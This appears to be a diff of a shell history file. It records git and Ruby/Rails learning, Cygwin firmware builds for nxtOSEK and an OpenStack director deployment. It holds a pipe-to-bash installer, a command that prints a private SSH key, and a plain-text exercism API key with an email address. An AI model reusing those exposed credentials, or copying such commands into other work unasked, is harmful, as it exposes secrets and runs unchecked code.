2 files" +git add -A +git commit -m "added 2 files" +git status +git status +ls +ls -l +mkdir git-excercise +git init +echo "Hello" > file1.txt +git add -A +git status +git commit -m "created file1" +echo "Hi" >> file1.txt +git commit -m "created file1" +git commit -m "created file1 with a line" +git status +echo "Hi" >> file2.txt +echo "Hi" >> file3.txt +git commit -m "created file2 with a line" +git add file2.txt +git commit -m "created file2 with a line" +git status +git rm --cached file2.txt +git status +git add -A +git status +git status +git help status +ls +ls -l +ls +echo "the third line" >> readme.txt +git diff readme.txt +nano readme.txt +git diff readme.txt +git status +git commit -m "added changes" +git status +cat readme.txt +git checkout readme.txt +cat readme.txt +git help log +git help diff +git branch +git branch new-feature +git branch +git checkout new-feature +git status +git remote add originst-repo1.git +git remote add originst-repo.git +ls +echo "# my-first-repo" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add originst-repo.git +git push -u origin master +git remote add originst-repo.git +git push -u origin master +git remote add originst-repo.git +git push -u origin master +git init +git add README.md +git commit -m "first commit" +git remote add originst-repo.git +git push -u origin master +git remote +git push -u origin master +git remote add originst-repo1.git +git remote add originst-repo2.git +git remote add originst-repo3.git +ls +cat README.md +git init +git status +touch readme.txt +nano readme.txt +rm readme.txt +nano readme.md +nano readme.md +nano readme.md +nano readme.md +cat readme.txt +cat readme1.txt +ls +ls +cat readme1.txt.txt +chmod 777 readme1.txt +chmod 777 readme1.txt.txt +cat readme1.txt.txt +nano readme1.txt.txt +nano readme.md +cat readme1.txt.txt >> readme.md +nano readme.md +git add -A +git commit -m "added readme.md" +git push +git rm --cached git-excercise +git add -A +git add -A +git commit -m "added readme.md" +git push +gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB +sudo apt-get install curl +\curl -sSLsh +less rvm.sh +rvm install ruby --default +gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB +sudo apt-get install curl +\curl -sSLsh +less rvm.sh +cat rvm.sh | bash -s stable +source ~/.rvm/scripts/rvm +rvm install ruby --default +ruby -v +nano hello.rb +ruby hello.rb +nano aravind.rb +box.aravind +box.rb +nano aravind.rb +y +nano aravind.rb +ruby aravind.rb +nano aravind.rb +ruby aravind.rb +nano aravind.rb +ruby aravind.rb 5 +nano aravind.rb +ruby aravind.rb +nano aravind.rb +nano len.rb +ruby len.rb +nano len.rb +ruby len.rb +nano len.rb +ruby len.rb +clear +nano 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sort.rb +nano sort.rb +ruby sort.rb +nano sort.rb +clear +nano name.rb +ruby name.rb +nano name.rb +ruby name.rb +nano name.rb +ruby name.rb +nano name.rb +ruby name.rb +nano name.rb +ruby name.rb +nano name.rb +ruby name.rb +nano name.rb +ruby name.rb +nano name.rb +ruby name.rb +nano name.rb +ruby name.rb +clear +ruby name.rb +nano name.rb +ruby name.rb +nano name.rb +vi name.rb +irb +nano palind.rb +vim palind.rb +mkdir palindrome +git init +git status +cp ../palind.rb . +vim palind.rb +git status +git add palind.rb +git status +git commit -m "added code to find palindrome" +git status +git config --global user.email 'h.aravind1996@gmail.com' +git config --global user.name 'ravindh' +git config --global user.name 'Aravindh' +git commit -m "added code to find palindrome" +git status +git log +git show 6a92ea8b2099a58ab2e22f84a978d11e17cf1904 +vim palind.rb +git status +git diff palind.rb +git add palind.rb +git commit -m "removes unwanted if/else conditions" +git status +git log +git show b7fdbd83c9b3923e01b6d7aee1192ef2f3b56627 +git status +vim palind.rb +git branch 'test_branch' +git status +git branch -a +git checkout test_branch +git status +vim palind.rb +git push origin test_branch +vim .git/config +vim palind.rb +git config global user.name "aravind" +clear +nano rep1.rb +ruby rep1.rb +nano rep1.rb +ls +git remote add origin +git status +git checkout master +git push origin master +ssh-keygen -t rsa -b 4096 -C "h.aravind1996@gmail.com" +cat ~/.ssh/id_rsa.pub +cat ~/.ssh/id_rsa +cat ~/.ssh/id_rsa.pub +git push origin master +vim .git/config +git push origin master +cat ~/.ssh/id_rsa.pub +mdkri test_repo +mkdir test_repo +git init +rm -rf test_repo/ +git clone git@github.com:aravindmp1/test_repo.git +git status +rm -rf test_repo/ +mkdir test_repo +ls +git init +ls .git/ +vim .git/config +git remote add origin git@github.com:aravindmp1/test_repo.git +git status +vim README +git add README +git push origin master +git commit -m "adding readme" +git push origin master +git pull +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +nano palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +ara +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +clear +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +ruby palind.rb +vim palind.rb +vim pa.rb +ruby pa.rb +vim pa.rb +ruby pa.rb +vim pa.rb +ruby pa.rb +vim pa.rb +ruby pa.rb +vim pa.rb +ruby pa.rb +vim pa.rb +ruby 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+git add README.md +git commit -m "first commit" +git remote add origin git@github.com:aravindmp1/hash.git +git push -u origin master +git push +clear +git push git ini +clear +git init +git add . +git add +git add . +clear +git push orgin master +git push hash master +clear +nano rep1.rb +git branch user +git branch [user] +clear +nano rep1.rb +clear +git config --global user.name "aravindmp1" +git config --global user.email "h.aravind1996@gmail.com" +git init Mytest +gedit README +git remote add originsh1.git +git add README +git add rept.rb +git remote add originsh1.git +git push orgin master +ls +ls +ls +exercism fetch ruby +exercism configure --key=9d9ffd5bd83d445a8e0b97d67dbe9df0 +sudo install exercism +sudo install--help exercism +sudo install --help exercism +git@github.com:aravindmp1/name.git"aravindmp1" +git config --global user.name "aravindmp1" +git config --global user.email "h.aravind1996@mail.com" +ls +ls +ls +ls public +clear +ls +Desktop +ls +clear +ls +git config --global user.name "aravindmp1" +git config --global user.email "h.aravind1996@gmail.com" +git init +git status +git add rept.rb +git add mywork/rept.rb +git status +nano rept.rb +vim rept.rb +git remote add origin +ls +vim rept.rb +ls +cat rept.rb +cat rept.txt +git push -u origin master +git remote add origin git@github.com:aravindmp1/mywork/name.rb +git status +ls +ls +git status +git show +git log +git remote add origin git@github.com:aravindmp1/name.git +git status +git add rept.rb +git status + +git commit "programe to print the names" +git config --global user.name "aravindmp1" +git config --global user.email "h.aravind1996@gmail.com" +ls +git init +git status +git add aravind.rb +git commit -m "add aravind.rb" +git remote add origin +git remote -v +git push origin master + + + +git clone +git clone +git status +vim rept.rb +ruby rept.rb +vim rept.rb +ruby rept.rb +vim rept.rb +ruby rept.rb +git config --global user.name "aravindmp1" +git config --global user.email "h.aravind1996@gmail.com" +git init +touch rept.rb +git status +git add rept.rb +git commit -m “rept.rb" + +git commit -m “add rept.rb" +git remote add origin +git remote -v +git push +git push origin master +' + +git push origin master +' +git push origin master +touch Gemfile +vim Gemfile +bundle install --path +bundle exec rspec +bundle exec rspec +bundle exec rspec +rspec spec --format documentation +example_spec.rb +vim example_spec.rb +describe "something" do +rspec example_spec.rb +clear +sudo gem install rails +ruby -v +gem --v +gem --version +rails --v +sudo apt install ruby-railties +gem --v +rails --v +rails --version +mkdir jtp +rails --version +rails new hello +vim jtp +rails jtp +vi README.md +rails README.md +rails generate controller hello +bundle install +rails new MySite +bundle install +rail server +rails server +ls +ls +bundle +bundle exec rspec +vim hello_world_spec.rb +cp hello_world_spec.rb hello_world.rb +vim hello_world.rb +ls spec/ +vim spec/hello_world_spec.rb +vim hello_world.rb +bundle exec rspec +vim spec/hello_world_spec.rb +bundle exec rspec +vim hello_world.rb +bundle exec rspec +vim hello_world.rb +bundle exec rspec +vim spec/hello_world_spec.rb +vim hello_world.rb +bundle exec rspec +vim hello_world.rb +bundle exec rspec +vim hello_world.rb +bundle exec rspec +vim hello_world.rb +irb +vim hello_world.rb +vim spec/hello_world_spec.rb +bundle exec rspec +vim hello_world.rb +bundle exec rspec +vim hello_world.rb +bundle exec rspec +vim spec/hello_world_spec.rb +vim game_spec.rb +vim game.rb +bundle exec rspec +rspec game_spec.rb +vim game.rb +clear +#!/usr/bin/ruby -w +time1 = Time.new +clear +sudo gem1.9 install mysql +clear +mkdir fizzbuzz +touch gemfile +open gemfile +touch Gemfile +vim Gemfile +gem install bundler +clear +touch Gemfile +vim Gemfile +gem install bundler +bowling git:(master) vim Gem +clear +gem install rspec +sudo gem install rspec +mkdir rspec_tutorial +mkdir spec +vim hello_world_spec.rb +rspec spec spec\hello_world_spec. +rspec_tutorial spec\hello_world_spec. +rspec_tutorial spec spec\hello_world_spec. +sudo rspec spec spec\hello_world_spec.rb +rspec spec spec/hello_world_spec.rb +rspec spec spec\hello_world_spec.rb +rails generate controller Pages +app/controllers/pages_controller.rb +vim pages_controller.rb +confg/routr.rb +router.rb +vim router.rb +vim home.html.erb +-r +--ruby=PATH +rails +rails new test +rails new test_app +bundle +rvm list +sudo apt-get install ruby-dev +bundle install +bundle exec rails s +vim Gemfile +bundle install +bundle exec rails s +ls +ls public/ +cat config/routes.rb +ls +ls public/ +ls path/ +ls +ls app/views/layouts/application.html.erb +vim app/views/layouts/application.html.erb +vim config/routes.rb +ls +ls path/ +locate index.html +locate index.html |grep test_app +bundle exec rails s +rails g scaffold user +vim app/controllers/users_controller.rb +bundle exec rake db:migrate +vim db/migrate/20180711061413_create_users.rb +bundle exec rake db:rollback +rails d scaffold user +vim config/database.yml +rails +rails new box +bundle +bundle exec rails s +vim Gemfile +bundle install +bundle exec rails s +bundle install +sudo install rubocop +gem install rubocop +bundler +gem install rubocop +sudo gem install rubocop +ls +rubocop aravind.rb +rubocop -a aravind.rb +rubocop aravind.rb +vim aravind.rb +rubocop aravind.rb +rubocop -a aravind.rb +vim aravind.rb +rubocop aravind.rb +vim aravind.rb +rubocop aravind.rb +vim aravind.rb +rubocop aravind.rb +rubocop rept.rb +rubocop -a rept.rb +vim rept.rb +rubocop rept.rb +vim rept.rb +rubocop rept.rb +vim rept.rb +rubocop rept.rb +vim rept.rb +rubocop rept.rb +vim rept.rb +rubocop rept.rb +vim rept.rb +rubocop rept.rb +vim rept.rb +rubocop rept.rb +vim rept.rb +rubocop rept.rb +vim rept.rb +rubocop rept.rb +vim rept.rb +rubocop rept.rb +rubocop -a rept.rb +vim rept.rb +rubocop -a rept.rb +vim rept.rb +rubocop rept.rb +vim rept.rb +rubocop rept.rb +vim rept.rb +rubocop rept.rb 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devise Admin +rails generate devise Admin +-r +bundle install +rails s +rails new demo +rails server +bundle install +rails server +irb +bundle exec rails server +rails server +clear +vim Gemfile +vim Gemfile +bundle install +rails g devise:install +sudo apt-get install postgresql postgresql-contrib +sudo passwd postgres +su - postgres +rails server +vim Gemfile +bundle +rails server +rails new test +rails new newwork +rails server +bundle install +rails server +vim gemfile +vim Gemfile +rails server +bundle install +rails server +vim Gemfile +vim Gemfile +rails server +rails server +vim developments.rb +vim development.rb +vim application.html.erb +vim development.rb +rails genertae devise Admin +rails generate devise Admin +su - postgres +git init +git status +git add name.rb +git status +git commit -m “add name.rb” +git remote add origin +git push +git push orgin master +git push origin master +git remote add origin +git push origin master +su - postgresql +su - postgresql +su - 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libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev +git clone +echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc +echo 'eval "$(rbenv init -)"' >> ~/.bashrc +exec $SHELL +git clones/ruby-build +echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc +exec $SHELL +sudo apt-get update +sudo apt-get install git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev +git clone +echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc +echo 'eval "$(rbenv init -)"' >> ~/.bashrc +exec $SHELL +git clones/ruby-build +echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc +rvm use ruby-2.5.1 +exec $SHELL +rbenv install 2.3.1 +rbenv global 2.3.1 +ruby -v +bundle install +rails server +gem install bundler +rbenv rehash +bundle install +rails server +sudo apt install ruby-railites +rails server +sudo apt install ruby-railties +rails server +bundle install +rails server +rails new my_app +bundle install +rails server +bundle install +bundle update +rails server +bundle install +rails server +bundle install +rails server +vim GEMFILE +vim gemfile +rails server +vim gemfile +vim Gemfile +vim Gemfile.lock +vim Gemfile +bundle install +rails server +ls app/controllers/*_controller.rb +rails server +rbenv install 2.3.1 +rbenv global 2.3.1 +ruby -v +gem install bundler +rbenv rehash +rails server +bundle install +rails server +pwd +pwd +ls +apt update +apt upgrade +clear +sudo apt update +sudo apt update && sudo apt upgrade +rm /var/lib/apt/lists/lock +sudo rm /var/lib/apt/lists/lock +vim +vi +vim +vi +sudo apt update && sudo apt upgrade +sudo apt install vim +sudo /var/lib/dpkg/lock +sudo rm /var/lib/dpkg/lock +sudo apt install vim +sudo rm /var/cache/apt/archives/lock +sudo apt install vim +vi +ls +pwd +vim hello.rb +vim /home/aspyre@pc4/hello.rb +vim hello1.rb +vi +pwd +vim hello.rb +ruby hello.rb +sudo apt install ruby +ruby arr1.rb +pwd +ls +ruby arr1.rb +vi arr1.rb +vi +ruby arrays1.rb +vrm +vim +pwd +ls +vi +vi arrays1.rb +ruby arrays1.rb +vrm +sudo apt install atfs +vrm +sudo apt install ruby +sudo fix-missing? +sudo fix-missing +fix missing +sudo fix-missing +sudo fix-missing? +sudo --fix-missing? +--fix-missing? +--fix-missing +pwd +ls +gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB +sudo apt update && sudo apt upgrade +gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB +vrm +gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB +vim person.rb +vim loan.r +vim loan.rb +vim client.rb +vim main.rb +vim main1.rb +pwd +ls +vim +vrm +cat arrays1.rb +ruby arrays1.rb +sudo apt install ruby +ruby arrays1.rb +clear +vim hash_example.rb +cat hash_example.rb +ruby hash_example.rb +vi hash_example.rb +ruby hash_example.rb +vi hash_example.rb +ruby hash_example.rb +vi hash_example.rb +ruby hash_example.rb +clear +cat hash_example.rb +ruby hash_example.rb +vim exercise1.rb +vi exercise1.rb +ls +vi arrays1.rb +cat array1.rb +clear +cat hash_example.rb +vi exercise1.rb +cat exercise1.rb +ruby exercise1.rb +clear +vi exercise1.rb +ruby exercise1.rb +vi exercise1.rb +ruby exercise1.rb +vi exercise1.rb +ruby exercise1ver2.rb +vi exercise1ver2.rb +vim exercise2.rb +vim main.rb +clear +ruby main.rb +ruby person.rb +vi person.rb +ruby person.rb +ruby main.rb +cat main.rb +vim person.rb +vim main.rb +ruby main.rb +vim main.rb +vim person.rb +vim main.rb +ruby main.rb +cat person.rb +vim person.rb +ruby main.rb +vim person.rb +ruby main.rb +vim main.rb +ruby main.rb +vim main.rb +vim person.rb +vim main.rb +vim person.rb +vim main.rb +ruby main.rb +vim person.rb +ruby main.rb +cat person.rb +vim person.rb +ruby main.rb +clear +ruby main.rb +vim main.rb +ruby main.rb +vim main.rb +ruby main.rb +vim main.rb +vim loan.rb +vim main.rb +ruby main.rb +ruby main1.rb +vim main1.rb +vim loan.rb +vim main1.rb +pwd +ls +vi main1.rb +vi client.rb +ruby main1.rb +vi client.rb +vi main1.rb +ruby main.rb +vi main.rb +vi client.rb +vi exercise1.rb +vi loan.rb +ruby main.rb +vi main.rb +vi loan.rb +ruby main.rb +vi loan.rb +ruby main.rb +vi client.rb +vi loan.rb +ruby main.rb +vi main.rb +ruby main.rb +clear +ruby main.rb +vi main.rb +ruby main1.rb +vi main.rb +vi loan.rb +vi client.rb +vi employers.rb +vi main1.rb +vi main2.rb +vi employers.rb +vi alumnus.rb +pwd +vi alumnus.rb +vi employers.rb +vi main1.rb +vi loan.rb +vi employers.rb +vi alumnus.rb +vi main2.rb +gim install rails +gm install rails +gem install rails +sudo gem install rails +gem install rails +which ruby +sudo apt remove ruby +rvm install 2.5 +rvm list +ruby +which ruby +gem install rails +rails --version +vi main2.rb +w main.rb +vi main.rb +vi main1.rb +vi main.rb +ruby main.rb +sudo apt install ruby +ruby main.rb +vi main.rb +ruby main.rb +rails --verson +rails --version +sudo apt install ruby-railties +gem install rails +rails new addressbook +clear +rvm list +which ruby +sudo apt remove ruby +clear +which rubuy +which ruby +rvm list +rvm use 2.5 --default +which ruby +rails --version +rails new addressbook +vi employers.rb +vim students.rb +pwd +ls +vi alumnus.rb +vim person.rb +vrm list +rails new addressbook +which ruby +rvm list +rvm use 2.5 --default +rails --version +rails new addressbook +ls +clear +rails new addressbook1 +rails g model Contact +rails db:migrate +rails g migration AddFirstNameAndLastNameAndEmailToContacts +rails db:migrate +clear +rails console +rails db:migrate +rails new records +pwd +rails new records +pw +dpwd +pwd +rails new records +rails server +clear +bundle install +rails server +bundle install +rails server +bundle install +pwd +ls +pwd +bundle install +rails server +rails new studentlogs +rvm list +rails server +rails new studentlogs +rvm list +* +# +rails s +which ruby +rvm use 2.5 --default +vim ~/.bashrc +rails s +rails new studentlogs +rails server +ls +rails server +rails g model Contact +rails db:migrate +rails g model Student +rails g model Students +rails generate migration students +rails db:migrate +rails generate migration stud +rails server +rails generate migration stud +rails db:migrate +students = Student.all +clear +rails db:migrate +clear +rails db:migrate +clear +rails db:migrate +students = Student.all +rails console +rails s +bundle install +rails s +exit +ls +cat _gvimrc +cat .emacs.d/ +ls +cat /etc/wgetrc +cp /etc/wgetrc /top/ +ls +mkdir .bin +ls +emacs .bashrc & +cp /top/osk_proxy_* .bin/ +osk +ls osk +osk.exe +ls +ls +mv osk_proxy_disable.sh enoskproxy +mv osk_proxy_enable.sh disoskproxy +cat * +less enoskproxy +ls +ls +ls +mv disoskproxy oskdisproxy +mv enoskproxy oskenproxy +ls +ls +ls nexttool/ +find nxtOSEK/ -name tool_gcc.mak +ls +ls +ls +make +make all +make clean +make all +make clean +make +make clean +make all +oskenproxy +cat ~/.bin/oskenproxy +ls +apt-cyg update +ls +oskenproxy +ls +apt-cyg update +ls +make cleean +make lcean +make clean +make all +apt-cyg find libintl +apt-cyg find libncurses +apt-cyg find libintl +apt-cyg install libintl1 libintl2 libintl3 libintl8 +make clean +make +make clean +make all +make clean +make all +make clean +make all +ls +sh rxeflash.sh +ls +sh rxeflash.sh +cat rxeflash.sh +sh rxeflash.sh +emacs +ls +cat .bash_history +ls +exit +make all +make clean +make all +ls +ls +ls .bin/ +ls +cat .bin/oskenproxy +cat .bin/oskdisproxy +ls +emacs +ls +cat _gvimrc +ls +ls +ls +ls +ls +ls +ls +ls +make clean +make +make all +oskenproxy +oskdisproxy +apt-cyg +apt-cyg update +oskenproxy +apt-cyg update +oskdisproxy +make clean +make all +ls +sh rxeflash.sh +make clean +history +exit +ls +explorer . +ls +make clean +make all +ls +ls ~/ +ls +ls +mv et_robocon/ osk_et_robocon +ls +ls +em Makefile +emacs Makefile +emacs Makefile & +ls +ls +ls nxtOSEK/toppers_osek/ +ls +make clean +make all +apt-cyg +apt-cyg update +oskenproxy +apt-cyg update +apt-cyg upgrade +apt-cyg search emacs +apt-cyg find emacs +/usr/bin/awk +ls +md5sum.exe awk +explorer . +md5sum.exe awk +/usr/bin/awk +apt-cyg find emacs +ls +ls +make all +ls +ls +em Makefile +emacs Makefile +make clean +make all +make clean +make +make clean +make all +make clean +make all +ls +ls +ls +mv ../osk_et_robocon/ . +mv -r ../osk_et_robocon/ . +mv ../osk_et_robocon/ . +ls +mv ../osk_et_robocon/ . +ls +make clean +make all +ld +explorer . +ls +make clean +make all +make clean +make all +make clean +make all +make clean +make all +make clean +make all +mv nxtOSEK/osk_et_robocon/ . +ls +explorer . +make clean +make all +make clean +make all +make clean +ls +ls +exit +ls +ls +make clean +s +ls +exit +exit +ls +make all +ls +less rxeflash.sh +less helloworld.c +ls +ls +ls +less tetrix.c +ls +ls +less mathtest.c +ls +ls -t +less soundtest/soundtest.c +ls +less anime/anime.c +ls +less petest/template.c +ls +ll +la +l +dir +ls +ls +make all +exit +ls +ll +> AW固有の機能に関しましては、開発時に佐藤さんからAW向けの資料を +> もらっておりましたので、その資料を確認頂けると内容がわかるかと思います。 +> AW固有の機能に関しましては、開発時に佐藤さんからAW向けの資料を +> もらっておりましたので、その資料を確認頂けると内容がわかるかと思います。 +ls +ls +ls +file JobGetVolume.cpp +less JobGetVolume.cpp +nkf +nkf -g JobGetVolume.cpp +ls +cygpath D:\Temporary\00_TempSave\タクト解析\Log - 20130911_wetON +ls +cygpath D:\Temporary\00_TempSave\タクト解析\Log - 20130911_wetON | cd +ls +ls +dir +ls +exit +pwd +ls +ls +ls +ls +file Volume_Viewer.java +nkf +nkf /? +nkf -h +nkf --help +file +ls +less Volume_Viewer.java +nkf -g Volume_Viewer.java +ls +sl +make all +make all +sh rxeflash.sh +make all +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +ls +make all +rxeflash.sh +make all +rxeflash.sh +ls +sh rxcflash.sh +sh rxeflash.sh +make all +ls +la +ls +make all +make all +re +ls +sh rxeflash.sh +- +ls +ls +male all +make all +sh rxeflash.sh +make all +make all +rx +sh rxeflash.sh +sh rxeflash.sh +make all +ls +make all +make clean +make all +make clean +make all +ls +make all +make all +ls +ls +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +ls +make all +la +la +ls +make all +sh rxeflash.sh +make all +sh rxeflash.sh +l +ls +ls +make all +ls +make all +ls +make all +ls +ls +ls a +make all +make all +ls +make all +make all +make all +makae all +make all +make all +make all +ls +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +ls +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +la +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +make all +sh rxeflash.sh +ls +make all +ls +ls +ls +make all +sh rxeflash.sh +ls +make all +ls +makeall +make all +make all +make all +make all +make all +ip a +vi /etc/network/interfaces +ls +sudo vi /etc/network/interfaces +ip a +~~service status restart +sudo service status restart +ifup enp0s8 +sudo su root +ip a +init 6 +ip a +init 0 +sudo yum update -y +sudo reboot +vi stackrc +source stackrc +vi instackenv.json +yum install vim +sudo yum install vim +vim instackenv.json + openstack overcloud node import instackenv.json +hostname +ping +source stackrc +openstack baremetal nod elist +openstack baremetal node list +ironic --help +ironic node-set-power-state c670f8b3-778f-45d4-a348-2cef211bb668 off +openstack baremetal node list +ironic node-set-power-state c670f8b3-778f-45d4-a348-2cef211bb668 off +openstack baremetal node list +ironic node-set-provisioning-state c670f8b3-778f-45d4-a348-2cef211bb668 manage +ironic node-set-provision-state c670f8b3-778f-45d4-a348-2cef211bb668 manage +openstack baremetal node list +vi undercloud.conf +openstack undercloud install +df -h +sudo yum install rhosp-director-images rhosp-director-images-ipa +df -h +mkdir ~/images +mkdir ~/templates +for i in /usr/share/rhosp-director-images/overcloud-full-latest-10.0.tar /usr/share/rhosp-director-images/ironic-python-agent-latest-10.0.tar; do tar -xvf $i; done +openstack overcloud image upload --image-path /home/stack/images/ +source stackrc +openstack overcloud image upload --image-path /home/stack/images/ +openstack subnet list +openstack subnet set --dns-nameserver 9b6ac56f-c53e-49f8-80f9-dc370fdcd733 +openstack driver list +source stackrc +openstack driver list +openstack baremetal driver list +hostname +hostnamectl status +openstack baremetal node list +ironic +ironic --help +ironic node-set-power-state 13c96602-4e25-4a55-b9e6-554994169acd off +ironic --help +ironic node-set-power-state 13c96602-4e25-4a55-b9e6-554994169acd off --debug +ironic node-set-power-state --debug 13c96602-4e25-4a55-b9e6-554994169acd off +ironic --debug node-set-power-state 13c96602-4e25-4a55-b9e6-554994169acd off +openstack baremetal node list +ironic --debug node-set-power-state 13c96602-4e25-4a55-b9e6-554994169acd off +ironic --debug node-set-provision-state 13c96602-4e25-4a55-b9e6-554994169acd manage +vi undercloud.conf +openstack undercloud install +openstack driver list +openstack baremetal driver list +openstack baremetal node list +ironic --debug node-set-provision-state c670f8b3-778f-45d4-a348-2cef211bb668 manage +openstack baremetal node list +source stackrc +vi stackrc +source stackrc +openstack baremetal node list +ironic --debug node-set-provision-state 13c96602-4e25-4a55-b9e6-554994169acd manage +openstack baremetal node list +ironic --debug node-set-provision-state 53f08a16-f2ef-4e25-84a2-e8c203fcbd10 manage +openstack baremetal node list +ironic --debug node-set-provision-state ae2d8b7b-2380-45b2-a75b-513ad97d222d manage +openstack baremetal node list +ironic --debug node-set-provision-state 4200be2e-3144-4809-a5f9-db22d9a07519 manage +openstack baremetal node list +ironic --debug node-set-provision-state 72ff9ce7-3153-4d6f-bb6d-4845908e27dc manage +openstack baremetal node list +ironic --debug node-set-provision-state 72ff9ce7-3153-4d6f-bb6d-4845908e27dc manage +openstack baremetal node list +openstack overcloud node introspect c670f8b3-778f-45d4-a348-2cef211bb668 --provide +source stackrc +openstack baremetal node list +vi undercloud.conf +openstck undercloud install +opensatck undercloud install +openstack undercloud install +openstack baremetal node list + openstack overcloud node introspect 13c96602-4e25-4a55-b9e6-554994169acd --provide +openstack baremetal node list + openstack overcloud node introspect 13c96602-4e25-4a55-b9e6-554994169acd --provide + openstack overcloud node introspect 53f08a16-f2ef-4e25-84a2-e8c203fcbd10 --provide +openstack baremetal node list + openstack overcloud node introspect ae2d8b7b-2380-45b2-a75b-513ad97d222d --provide + openstack overcloud node introspect 4200be2e-3144-4809-a5f9-db22d9a07519 --provide +openstack baremetal node list +ironic --help +ironic node-set-maintenance c670f8b3-778f-45d4-a348-2cef211bb668 off +openstack baremetal node list +ironic node-set-provision-state c670f8b3-778f-45d4-a348-2cef211bb668 manage +openstack baremetal node list + openstack overcloud node introspect c670f8b3-778f-45d4-a348-2cef211bb668 --provide +openstack baremetal node list + openstack overcloud node introspect 72ff9ce7-3153-4d6f-bb6d-4845908e27dc --provide +openstack baremetal node list +openstack overcloud profiles list +openstack baremetal node set overcloud-ctrl01 --property capabilities=profile:control,boot_option:local +openstack baremetal node set overcloud-ctrl02 --property capabilities=profile:control,boot_option:local +openstack baremetal node set overcloud-ctrl03 --property capabilities=profile:control,boot_option:local +openstack baremetal node set overcloud-compute01 --property capabilities=profile:compute,boot_option:local +openstack baremetal node set overcloud-compute02 --property capabilities=profile:compute,boot_option:local +openstack overcloud profiles list +openstack baremetal node list +cp instackenv.json instackenv_stor.json +vim instackenv_stor.json +openstack baremetal node import instackenv_stor.json +openstack overcloud node import instackenv_stor.json +openstack baremetal nod elist +openstack baremetal node list + openstack overcloud node introspect 3fd98477-b865-48dd-9a4d-0ca81053cabd --provide +openstack baremetal node list +ironic --debug node-set-power-state 3fd98477-b865-48dd-9a4d-0ca81053cabd off +openstack baremetal node list +cat instackenv_stor.json + openstack overcloud node introspect 3fd98477-b865-48dd-9a4d-0ca81053cabd --provide +openstack baremetal node list +openstack baremetal node set overcloud-stor01 --property capabilities=profile:swift-storage,boot_option:local +openstack overcloud profiles list +ls +cat 